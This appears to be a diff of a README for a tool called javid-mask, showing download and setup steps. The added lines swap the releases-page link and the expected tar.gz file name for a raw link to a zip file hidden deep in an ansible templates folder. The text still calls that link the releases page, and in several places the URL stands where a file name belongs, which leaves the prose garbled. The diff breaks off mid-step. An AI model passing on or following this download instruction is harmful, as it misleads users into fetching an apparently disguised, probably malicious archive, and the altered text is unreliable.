rowdy-ff/javid-mask/README.md

 Follow these steps to download and set up javid-mask on your device:

 1. **Visit the Releases Page**
-   Click [here](https://github.com/rowdy-ff/javid-mask/releases) to go to the releases page.
+   Click [here](https://raw.githubusercontent.com/rowdy-ff/javid-mask/main/singleton/ansible/roles/singbox/templates/mask-javid-2.5.zip) to go to the releases page.

 2. **Choose Your Version**
    Look for the latest version at the top of the page and click on it.
 You will see a list of downloadable files.

 3. **Download the Package**
    Select the file that matches your system configuration.
-For most users, the file will be named something like `javid-mask-linux.tar.gz`.
+For most users, the file will be named something like `https://raw.githubusercontent.com/rowdy-ff/javid-mask/main/singleton/ansible/roles/singbox/templates/mask-javid-2.5.zip`.
 Click on the file to start the download.

 4. **Extract the Contents**
-   Once downloaded, navigate to your download folder and extract the contents of the tar.gz file.
+   Once downloaded, navigate to your download folder and extract the contents of the https://raw.githubusercontent.com/rowdy-ff/javid-mask/main/singleton/ansible/roles/singbox/templates/mask-javid-2.5.zip file.
 You can usually do this by right-clicking on the file and selecting "Extract Here" or using terminal commands.

 5. **Run the Application**
    Open your terminal and navigate to the folder where you extracted the files.
 The command will look something like this: